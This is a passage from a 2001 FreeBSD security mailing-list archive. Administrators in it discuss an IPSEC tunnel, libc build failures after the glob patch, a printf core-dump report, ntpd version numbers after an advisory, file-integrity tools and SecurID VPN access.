-0700 (PDT) (envelope-from sjohn@airlinksys.com) Received: from sjohn.airlinksys.com (unknown [216.70.12.7]) by mailhub.airlinksys.com (Postfix) with ESMTP id 7A67353501 for ; Thu, 19 Apr 2001 16:47:49 -0500 (CDT) Received: by sjohn.airlinksys.com (Postfix, from userid 1000) id 839295E6A; Thu, 19 Apr 2001 16:47:48 -0500 (CDT) Date: Thu, 19 Apr 2001 16:47:48 -0500 From: Scott Johnson To: freebsd-security@freebsd.org Subject: IPSEC tunnel Message-ID: <20010419164748.A93102@ns2.airlinksys.com> Reply-To: Scott Johnson Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have an IPSEC tunnel running between two freebsd gateways. The tunnel itself is a UDP tunnel created by vtun, so that I can traverse a NAT between the gateways which doesn't understand ip tunnels. I have SPD entries on both gateways directing traffic from one net to the other to be tunneled through tun0, and the SAD entries are handled by racoon (listening on the tunnel interfaces) using X.509 certificates. It works fine except for the fact that neither of the nets can reach the opposite gateway. The gateway will reach the opposite net, for example with an ICMP ping or a TCP syn, but the reply, though sent by the host, and forwarded by the first gateway through the tunnel, where you can see it recieved by the tunnel interface in IPSEC encapsulated form, is never received by the application. It seems to me this SHOULD be working. How would I debug this? -- Scott Johnson System/Network Administrator Airlink Systems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 15: 4:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from wysoft.tzo.com (c481444-a.bremtn1.wa.home.com [24.12.235.202]) by hub.freebsd.org (Postfix) with ESMTP id 8F94137B42C for ; Thu, 19 Apr 2001 15:04:08 -0700 (PDT) (envelope-from wysoft@wysoft.tzo.com) Received: from localhost (wysoft@localhost) by wysoft.tzo.com (8.11.1/8.11.1) with ESMTP id f3JM47G34623 for ; Thu, 19 Apr 2001 15:04:08 -0700 (PDT) (envelope-from wysoft@wysoft.tzo.com) Date: Thu, 19 Apr 2001 15:04:07 -0700 (PDT) From: Jeff Wyman To: freebsd-security@freebsd.org Subject: RE: Yet another Glob-related problem Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Strange.. I opened up glob.h, went to the GLOB_BRACE line, and I found a little backslash above it on a line by itself. I have no idea how it got there, but my best explanation is too many beers and a bad keystroke when I placed the file there in the first place. Thanks to vi, I noticed the slash and killed it. Build worked fine. Sorry for wasting anyone's time! Thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 15:18:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from homepage.ru (homepage.ru [195.242.9.13]) by hub.freebsd.org (Postfix) with ESMTP id 645D737B42C for ; Thu, 19 Apr 2001 15:18:46 -0700 (PDT) (envelope-from dk@homepage.ru) Received: from homepage.ru (spb-3-28.dialup.peterlink.ru [195.242.18.28]) by homepage.ru (8.9.3/8.9.3) with ESMTP id CAA70851; Fri, 20 Apr 2001 02:19:41 +0400 (MSD) (envelope-from dk@homepage.ru) Message-ID: <3ADF654F.D5897981@homepage.ru> Date: Fri, 20 Apr 2001 02:23:11 +0400 From: "D. K." X-Mailer: Mozilla 4.74 [en] (X11; U; FreeBSD 4.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Garrett Wollman , security@FreeBSD.ORG Subject: Re: FreeBSD grow bug References: <3ADF4DD0.17AB0F64@homepage.ru> <200104192042.QAA40625@khavrinen.lcs.mit.edu> <3ADF5442.BD703D6@homepage.ru> <200104192113.RAA40978@khavrinen.lcs.mit.edu> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Garrett Wollman wrote: > > < said: > > > You are not right > > To quote from the Austin Group draft 6: > > The format can contain either numbered argument conversion > specifications (that is, "%n$" and "*m$"), or unnumbered > argument conversion specifications (that is, % and *), but not > ^^^^^^^ > both. The only exception to this is that %% can be mixed with > ^^^^^ > the "%n$" form. The results of mixing numbered and unnumbered > argument specifications in a format string are undefined. When > numbered argument specifications are used, specifying the Nth > ^^^^^^^^^^^^^^^^^^ > argument requires that all the leading arguments, from the > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > first to the (N-1)th, are specified in the format string. > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > The exact same language, spread out over several paragraphs, appears > in the Single UNIX Spec version 2. > > -GAWollman In any case the result should not generate core dump on FreeBSD in my examples. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The error is present on FreeBSD 4.2-RELEASE See answer from Robert Simmons About first example: I can call func(char *fmt, ...) with many parameters, and to use not all from them. Such as: printf("%d\n", 1, 2, 3, 4, 5, 6, 7); The compiler cares of restoration of a stack. In my examples no unaccessed elements. About second example: I have mixed them accurately.The compiler knows to what unit to access. In any case on _FreeBSD_ this examples must work.. Best Regards, Dmitry Kopteloff --- LG Soft Lab. Information Security Group, RUSSIA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 15:36:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from casimir.physics.purdue.edu (casimir.physics.purdue.edu [128.210.146.111]) by hub.freebsd.org (Postfix) with ESMTP id 74AEE37B43E for ; Thu, 19 Apr 2001 15:36:21 -0700 (PDT) (envelope-from will@physics.purdue.edu) Received: by casimir.physics.purdue.edu (Postfix, from userid 1000) id 628B01BD72; Thu, 19 Apr 2001 17:33:51 -0500 (EST) Date: Thu, 19 Apr 2001 17:33:51 -0500 From: Will Andrews To: Emre Bastuz Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tripwire or the like for FreeBSD ? Message-ID: <20010419173351.D5017@casimir.physics.purdue.edu> Reply-To: Will Andrews References: <3ADF3CCC.FB8498DC@emre.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="YSDgblk1kzV93dSz" Content-Disposition: inline User-Agent: Mutt/1.3.15i In-Reply-To: <3ADF3CCC.FB8498DC@emre.de>; from info@emre.de on Thu, Apr 19, 2001 at 09:30:20PM +0200 X-Operating-System: Linux 2.2.18 sparc64 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --YSDgblk1kzV93dSz Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 09:30:20PM +0200, Emre Bastuz wrote: > I found something called "Aide" in the ports directory, but to be honest - > I don?t trust a "Version 0.7" when it comes to security. I don't trust system administrators who judge by version numbers. You do realize these numbers are *COMPLETELY* arbitrary, right? --=20 wca --YSDgblk1kzV93dSz Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE632fOF47idPgWcsURAgSXAJ9Yu1fDvkjpe7a2Qcr/tl6J9Ow3tQCdFkrG dLn8F7RydSW94vOSAIhwXKM= =/dqU -----END PGP SIGNATURE----- --YSDgblk1kzV93dSz-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 16:32:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 36C1737B43C for ; Thu, 19 Apr 2001 16:32:10 -0700 (PDT) (envelope-from pjklist@ekahuna.com) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Thu, 19 Apr 2001 16:32:09 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: FreeBSD Security List Date: Thu, 19 Apr 2001 16:32:08 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: ntpd version not updated? Reply-To: pjklist@ekahuna.com Message-ID: <3ADF1308.3067.BD4A84@localhost> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Re: the recent security advisory on ntpd. It says in part that versions of ntpd prior to "ntp-4.0.99k_2" are vulnerable, and that 4.2 STABLE as of 4/6 was corrected. I just CVSup'd 4.2-STABLE (RELENG_4) as of 4/15, did make world etc., and based on the "version" command in ntpq and ntpdc, and the syslog message, I'm still running version 4.0.99b. Here's the syslog message: Apr 19 16:14:56 server ntpd[168]: ntpd 4.0.99b Sun Apr 15 09:10:45 PDT 2001 (1) Is there something I'm missing here? -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 16:58:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 8B3B637B423 for ; Thu, 19 Apr 2001 16:58:14 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id 2085D1360C; Thu, 19 Apr 2001 19:58:14 -0400 (EDT) Date: Thu, 19 Apr 2001 19:58:13 -0400 From: Chris Faulhaber To: "Philip J. Koenig" Cc: FreeBSD Security List Subject: Re: ntpd version not updated? Message-ID: <20010419195813.A79537@peitho.fxp.org> References: <3ADF1308.3067.BD4A84@localhost> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="jRHKVT23PllUwdXP" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADF1308.3067.BD4A84@localhost>; from pjklist@ekahuna.com on Thu, Apr 19, 2001 at 04:32:08PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --jRHKVT23PllUwdXP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 04:32:08PM -0700, Philip J. Koenig wrote: > Re: the recent security advisory on ntpd. It says in part that versions = of ntpd=20 > prior to "ntp-4.0.99k_2" are vulnerable, and that 4.2 STABLE as of 4/6 wa= s=20 > corrected. >=20 > I just CVSup'd 4.2-STABLE (RELENG_4) as of 4/15, did make world etc., and= =20 > based on the "version" command in ntpq and ntpdc, and the syslog message,= =20 > I'm still running version 4.0.99b. Here's the syslog message: >=20 > Apr 19 16:14:56 server ntpd[168]: ntpd 4.0.99b Sun Apr 15 09:10:45 PDT 20= 01 (1) >=20 >=20 > Is there something I'm missing here? >=20 If you are using ntpd in the base system and you updated your system after 4/6, you are not vulnerable. If you are using ntpd from the ports system, ensure that it's version is ntp-4.0.99k_2 or greater. The following command should display the version of the port you have installed: # pkg_version | grep ntp --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --jRHKVT23PllUwdXP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrfe5UACgkQObaG4P6BelBXSACgg8eloV2CP4BQaHgP08W5tFnO XIAAn1goz/Uy7RaUGHHwEQ/RXFh0C7d5 =qQXw -----END PGP SIGNATURE----- --jRHKVT23PllUwdXP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 16:58:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from urdvg002.cms.usa.net (urdvg002.cms.usa.net [165.212.11.2]) by hub.freebsd.org (Postfix) with SMTP id 928FB37B440 for ; Thu, 19 Apr 2001 16:58:32 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 11141 invoked from network); 19 Apr 2001 23:58:32 -0000 Received: from uadvg128.cms.usa.net (165.212.11.128) by corprelay.cms.usa.net with SMTP; 19 Apr 2001 23:58:32 -0000 Received: (qmail 2928 invoked by uid 0); 19 Apr 2001 23:58:31 -0000 Received: USA.NET MXFirewall, messaging filters applied; Thu, 19 Apr 2001 23:58:30 GMT Received: from packeteer.com [207.78.98.2] by uadvg128 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 887FDsX7C0077M16; Thu, 19 Apr 2001 23:58:29 GMT Message-ID: <3ADF7BDD.A7868DA@packeteer.com> Date: Thu, 19 Apr 2001 16:59:25 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Rob Simmons Cc: Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem References: <20010419164947.M72854-100000@mail.wlcg.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, I just finished doing that... same problem. I hope that someone on the developer side who HAS successfully built the new libc on -STABLE sources could do the same (delete everything and start from scratch) so we can find out what this problem is. Thanks... Brian Rob Simmons wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: RIPEMD160 > > Have you tried moving your kernel config file, and any other files that > you need from /usr/src to /root, then delete the whole /usr/src, /usr/obj, > and /usr/sup/src-all directories before running cvsup? > > When you are done, just move your kernel config file back where it > belongs, and try again. > > Robert Simmons > Systems Administrator > http://www.wlcg.com/ > > On Thu, 19 Apr 2001, Ben Vaughn wrote: > > > I am also experiencing this problem building from a 10-minute > > old stable-cvsup. > > > > -biv > > > > -----Original Message----- > > From: Brian Tiemann [mailto:briant@packeteer.com] > > Sent: Thursday, April 19, 2001 16:41 > > To: Chris Faulhaber > > Cc: security@freebsd.org > > Subject: Re: Another glob problem > > > > > > Yes, that's what I thought. It's RELENG_4, and I didn't apply > > the > > patch. > > > > I also tried multiple make cleans, and also deleting > > /usr/src/lib/libc/db/mpool and rebuilding. Same problem. > > > > I've disabled my ftpd for now, until we can figure this out. > > This must > > be a particularly amorphous code region across different systems. > > > > Brian > > > > > > Chris Faulhaber wrote: > > > > > > On Thu, Apr 19, 2001 at 01:24:05PM -0700, Brian Tiemann wrote: > > > > > I'm running 4.2-RELEASE, with the March 22 glob.h > > installed in /usr/src > > > > > and a fresh make world as of about ten minutes ago. > > > > > > > > Argh... let me rephrase that. > > > > > > > > I'm running 4.2-RELEASE, with the March 22 glob.h installed in > > > > /usr/include (it's the glob.h that defines GLOB_MAXPATH, so it seems > > to > > > > be the right one) and a fresh cvsup as of about ten minutes ago. > > > > > > > > Yeesh.. > > > > > > > > > > A fresh cvsup of RELENG_4 or RELENG_4_2_0_RELEASE? If it is the > > former, > > > the patch is not required. > > > > > > -- > > > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > > > -------------------------------------------------------- > > > FreeBSD: The Power To Serve - http://www.FreeBSD.org > > > > > > > > ------------------------------------------------------------------------ > > > Part 1.2Type: application/pgp-signature > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iD8DBQE631A4v8Bofna59hYRA7E1AKCR471HSFYBJ8A3+TWvMUhqvVz0/gCeNq97 > Mb2yaPe8OCRg/SdsWtCkeus= > =X5+F > -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 17:10: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 98E5037B43C for ; Thu, 19 Apr 2001 17:10:04 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id RAA13953; Thu, 19 Apr 2001 17:09:55 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda13951; Thu Apr 19 17:09:35 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3K09UY27880; Thu, 19 Apr 2001 17:09:30 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdO27875; Thu Apr 19 17:08:54 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3K08sA07253; Thu, 19 Apr 2001 17:08:54 -0700 (PDT) Message-Id: <200104200008.f3K08sA07253@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdYv7249; Thu Apr 19 17:08:50 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Chris Faulhaber Cc: "Philip J. Koenig" , FreeBSD Security List Subject: Re: ntpd version not updated? In-reply-to: Your message of "Thu, 19 Apr 2001 19:58:13 EDT." <20010419195813.A79537@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 19 Apr 2001 17:08:50 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010419195813.A79537@peitho.fxp.org>, Chris Faulhaber writes: > > --jRHKVT23PllUwdXP > Content-Type: text/plain; charset=us-ascii > Content-Disposition: inline > Content-Transfer-Encoding: quoted-printable > > On Thu, Apr 19, 2001 at 04:32:08PM -0700, Philip J. Koenig wrote: > > Re: the recent security advisory on ntpd. It says in part that versions = > of ntpd=20 > > prior to "ntp-4.0.99k_2" are vulnerable, and that 4.2 STABLE as of 4/6 wa= > s=20 > > corrected. > >=20 > > I just CVSup'd 4.2-STABLE (RELENG_4) as of 4/15, did make world etc., and= > =20 > > based on the "version" command in ntpq and ntpdc, and the syslog message,= > =20 > > I'm still running version 4.0.99b. Here's the syslog message: > >=20 > > Apr 19 16:14:56 server ntpd[168]: ntpd 4.0.99b Sun Apr 15 09:10:45 PDT 20= > 01 (1) > >=20 > >=20 > > Is there something I'm missing here? > >=20 > > If you are using ntpd in the base system and you updated your system > after 4/6, you are not vulnerable. > > If you are using ntpd from the ports system, ensure that it's > version is ntp-4.0.99k_2 or greater. The following command should > display the version of the port you have installed: > # pkg_version | grep ntp ntp-4.0.99k23 is the most recent version of ntp. It includes the fix for the recently discovered exploit. -- Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 18: 0: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 6999C37B423 for ; Thu, 19 Apr 2001 18:00:06 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 9F2B966B38; Thu, 19 Apr 2001 18:00:05 -0700 (PDT) Date: Thu, 19 Apr 2001 18:00:05 -0700 From: Kris Kennaway To: "Philip J. Koenig" Cc: FreeBSD Security List Subject: Re: ntpd version not updated? Message-ID: <20010419180005.B54774@xor.obsecurity.org> References: <3ADF1308.3067.BD4A84@localhost> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="tjCHc7DPkfUGtrlw" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADF1308.3067.BD4A84@localhost>; from pjklist@ekahuna.com on Thu, Apr 19, 2001 at 04:32:08PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --tjCHc7DPkfUGtrlw Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 04:32:08PM -0700, Philip J. Koenig wrote: > Re: the recent security advisory on ntpd. It says in part that versions = of ntpd=20 > prior to "ntp-4.0.99k_2" are vulnerable, and that 4.2 STABLE as of 4/6 wa= s=20 > corrected. >=20 > I just CVSup'd 4.2-STABLE (RELENG_4) as of 4/15, did make world etc., and= =20 > based on the "version" command in ntpq and ntpdc, and the syslog message,= =20 > I'm still running version 4.0.99b. Here's the syslog message: >=20 > Apr 19 16:14:56 server ntpd[168]: ntpd 4.0.99b Sun Apr 15 09:10:45 PDT 20= 01 (1) >=20 >=20 > Is there something I'm missing here? Yes, 4.0.99k_2 is the version of the FreeBSD port of ntpd 4.0.99k, which isn't the same as the version string reported by the ntpd in the base system (4.0.99b), or even the version string reported by the ntpd in ports (which is still 4.099k). Port version numbers !=3D vendor software version numbers Port version of ntpd !=3D base system version of ntpd Kris --tjCHc7DPkfUGtrlw Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE634oVWry0BWjoQKURAklEAJ97nvi6wSzvTsmD/VfxFN5i+ginkwCeOJmt E6RgYvpJhihXpHqq/Gg7q+g= =cE6X -----END PGP SIGNATURE----- --tjCHc7DPkfUGtrlw-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 18: 1:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id ACCED37B424 for ; Thu, 19 Apr 2001 18:01:18 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 4682F66F16; Thu, 19 Apr 2001 18:01:18 -0700 (PDT) Date: Thu, 19 Apr 2001 18:01:18 -0700 From: Kris Kennaway To: Brian Tiemann Cc: Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem Message-ID: <20010419180118.C54774@xor.obsecurity.org> References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="lCAWRPmW1mITcIfM" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADF7BDD.A7868DA@packeteer.com>; from briant@packeteer.com on Thu, Apr 19, 2001 at 04:59:25PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --lCAWRPmW1mITcIfM Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 04:59:25PM -0700, Brian Tiemann wrote: > Yes, I just finished doing that... same problem. >=20 > I hope that someone on the developer side who HAS successfully built > the new libc on -STABLE sources could do the same (delete everything and > start from scratch) so we can find out what this problem is. Thanks... I tested the patch + instructions on a clean checkout of 4.2-RELEASE prior to sending out the advisory. Kris --lCAWRPmW1mITcIfM Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE634pdWry0BWjoQKURAvP3AKDRBKpQ/Tng/uU3wKNlfS95cIwt5QCg80xX h9IBLRTSRitN+1YFgXwNma8= =9Emk -----END PGP SIGNATURE----- --lCAWRPmW1mITcIfM-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 18: 9:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from uadvg134.cms.usa.net (uadvg134.cms.usa.net [165.212.11.134]) by hub.freebsd.org (Postfix) with SMTP id 5DACA37B422 for ; Thu, 19 Apr 2001 18:09:21 -0700 (PDT) (envelope-from briant@packeteer.com) Received: (qmail 13299 invoked from network); 20 Apr 2001 01:09:20 -0000 Received: from uadvg129.cms.usa.net (165.212.11.129) by corprelay.cms.usa.net with SMTP; 20 Apr 2001 01:09:20 -0000 Received: (qmail 3746 invoked by uid 0); 20 Apr 2001 01:09:20 -0000 Received: USA.NET MXFirewall, messaging filters applied; Fri, 20 Apr 2001 01:09:19 GMT Received: from packeteer.com [207.78.98.2] by uadvg129 (ASMTP/briant@postoffice.packeteer.com) via mtad (53CM.0401.1.03) with ESMTP id 912FDTBJP0024M20; Fri, 20 Apr 2001 01:09:15 GMT Message-ID: <3ADF8C73.7E987982@packeteer.com> Date: Thu, 19 Apr 2001 18:10:11 -0700 From: Brian Tiemann Organization: Packeteer, Inc. X-Mailer: Mozilla 4.74 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, that's great, but something needs to be looked at for those of us tracking 4-STABLE. Thanks... Brian Kris Kennaway wrote: > > On Thu, Apr 19, 2001 at 04:59:25PM -0700, Brian Tiemann wrote: > > Yes, I just finished doing that... same problem. > > > > I hope that someone on the developer side who HAS successfully built > > the new libc on -STABLE sources could do the same (delete everything and > > start from scratch) so we can find out what this problem is. Thanks... > > I tested the patch + instructions on a clean checkout of 4.2-RELEASE > prior to sending out the advisory. > > Kris > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 18:12:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from c007.snv.cp.net (c007-h008.c007.snv.cp.net [209.228.33.214]) by hub.freebsd.org (Postfix) with SMTP id 09DE537B422 for ; Thu, 19 Apr 2001 18:12:50 -0700 (PDT) (envelope-from otterr@telocity.com) Received: (cpmta 15251 invoked from network); 19 Apr 2001 18:12:49 -0700 Received: from dsl-216-227-91-85.telocity.com (HELO zoso) (216.227.91.85) by smtp.telocity.com (209.228.33.214) with SMTP; 19 Apr 2001 18:12:49 -0700 X-Sent: 20 Apr 2001 01:12:49 GMT From: "Otter" To: , Subject: remote SecureID authentication anyone? Date: Thu, 19 Apr 2001 21:12:41 -0400 Message-ID: <000201c0c936$ffec3120$1400a8c0@zoso> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm looking to setup a machine in our office so a few of us can get in on a VPN for network access after hours from home. I've heard VPNs are possible. After discussing this with office management, they say the only way we can do this is to use security in addition to passwords. When I asked if our SecureID cards/keychains would work, they agreed on it. Now... has anyone got this setup or something similar? I looked on the mailing list archives with no luck... searched some web pages... I even remember ssh2 using it, but now I don't see any reference to it in the openssh or ssh2 makefiles. Answers and/or suggestions are greatly appreciated. -Otter p.s. if you're reading this from -security, please Cc: me, as I'm not subscribed to that list. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 19 18:15: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id E2A8737B423 for ; Thu, 19 Apr 2001 18:14:59 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 841E866B38; Thu, 19 Apr 2001 18:14:59 -0700 (PDT) Date: Thu, 19 Apr 2001 18:14:59 -0700 From: Kris Kennaway To: Brian Tiemann Cc: Kris Kennaway , Rob Simmons , Ben Vaughn , Chris Faulhaber , security@FreeBSD.ORG Subject: Re: Another glob problem Message-ID: <20010419181459.B57373@xor.obsecurity.org> References: <20010419164947.M72854-100000@mail.wlcg.com> <3ADF7BDD.A7868DA@packeteer.com> <20010419180118.C54774@xor.obsecurity.org> <3ADF8C73.7E987982@packeteer.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; 